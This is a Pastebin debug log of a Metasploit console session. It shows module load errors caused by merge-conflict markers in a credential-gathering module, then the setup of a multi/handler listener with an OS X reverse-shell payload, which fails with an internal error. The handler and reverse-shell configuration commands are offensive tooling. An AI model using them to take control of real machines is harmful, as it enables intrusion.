Advertisement
eromang

metasploit debug1

Nov 5th, 2012
675
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.70 KB | None | 0 0
  1. eromang@devnull:~$ sudo msfconsole
  2. [-] WARNING! The following modules could not be loaded!
  3. [-] /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb: SyntaxError /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:35: syntax error, unexpected tLSHFT, expecting ')'
  4. <<<<<<< .mine
  5. ^
  6. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:36: syntax error, unexpected tASSOC, expecting keyword_end
  7. 'Version' => '$Revision: 16005 $',
  8. ^
  9. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:36: syntax error, unexpected ',', expecting keyword_end
  10. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:37: syntax error, unexpected tASSOC, expecting keyword_end
  11. 'Platform' => [ 'windows' ],
  12. ^
  13. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:37: syntax error, unexpected ',', expecting keyword_end
  14. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:39: syntax error, unexpected tASSOC, expecting keyword_end
  15. 'Version' => '$Revision: 16005 $',
  16. ^
  17. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:39: syntax error, unexpected ',', expecting keyword_end
  18. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:40: syntax error, unexpected tASSOC, expecting keyword_end
  19. 'Platform' => [ 'win' ],
  20. ^
  21. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:40: syntax error, unexpected ',', expecting keyword_end
  22. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:42: syntax error, unexpected tASSOC, expecting keyword_end
  23. 'SessionTypes' => [ 'meterpreter' ]
  24. ^
  25. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:43: syntax error, unexpected ')', expecting keyword_end
  26. ))
  27. ^
  28. /opt/metasploit/msf3/modules/post/windows/gather/credentials/outlook.rb:379: syntax error, unexpected $end, expecting keyword_end
  29.  
  30.  
  31. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
  32. MMMMMMMMMMM MMMMMMMMMM
  33. MMMN$ vMMMM
  34. MMMNl MMMMM MMMMM JMMMM
  35. MMMNl MMMMMMMN NMMMMMMM JMMMM
  36. MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
  37. MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
  38. MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
  39. MMMNI MMMMM MMMMMMM MMMMM jMMMM
  40. MMMNI MMMMM MMMMMMM MMMMM jMMMM
  41. MMMNI MMMNM MMMMMMM MMMMM jMMMM
  42. MMMNI WMMMM MMMMMMM MMMM# JMMMM
  43. MMMMR ?MMNM MMMMM .dMMMM
  44. MMMMNm `?MMM MMMM` dMMMMM
  45. MMMMMMN ?MM MM? NMMMMMN
  46. MMMMMMMMNe JMMMMMNMMM
  47. MMMMMMMMMMNm, eMMMMMNMMNMM
  48. MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
  49. MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
  50.  
  51.  
  52.  
  53. =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
  54. + -- --=[ 980 exploits - 525 auxiliary - 160 post
  55. + -- --=[ 262 payloads - 28 encoders - 8 nops
  56.  
  57. msf > use exploit/multi/handler
  58. msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp
  59. PAYLOAD => osx/x86/shell_reverse_tcp
  60. semsf exploit(handler) > ifconfig
  61. [*] exec: ifconfig
  62.  
  63. eth0 Link encap:Ethernet HWaddr 00:0c:29:e0:ef:41
  64. inet addr:192.168.178.26 Bcast:192.168.178.255 Mask:255.255.255.0
  65. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  66. RX packets:88069 errors:0 dropped:0 overruns:0 frame:0
  67. TX packets:43683 errors:0 dropped:0 overruns:0 carrier:0
  68. collisions:0 txqueuelen:1000
  69. RX bytes:106080018 (106.0 MB) TX bytes:5794234 (5.7 MB)
  70.  
  71. lo Link encap:Local Loopback
  72. inet addr:127.0.0.1 Mask:255.0.0.0
  73. inet6 addr: ::1/128 Scope:Host
  74. UP LOOPBACK RUNNING MTU:16436 Metric:1
  75. RX packets:258514 errors:0 dropped:0 overruns:0 frame:0
  76. TX packets:258514 errors:0 dropped:0 overruns:0 carrier:0
  77. collisions:0 txqueuelen:0
  78. RX bytes:68142527 (68.1 MB) TX bytes:68142527 (68.1 MB)
  79.  
  80. msf exploit(handler) > set LHOST 192.168.178.26
  81. LHOST => 192.168.178.26
  82. shmsf exploit(handler) > show options
  83.  
  84. Module options (exploit/multi/handler):
  85.  
  86. Name Current Setting Required Description
  87. ---- --------------- -------- -----------
  88.  
  89.  
  90. Payload options (osx/x86/shell_reverse_tcp):
  91.  
  92. Name Current Setting Required Description
  93. ---- --------------- -------- -----------
  94. LHOST 192.168.178.26 yes The listen address
  95. LPORT 4444 yes The listen port
  96.  
  97.  
  98. Exploit target:
  99.  
  100. Id Name
  101. -- ----
  102. 0 Wildcard Target
  103.  
  104.  
  105. msf exploit(handler) > exploit -j
  106.  
  107. [-] Exploit failed: can't add a new key into hash during iteration
  108. msf exploit(handler) > quit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement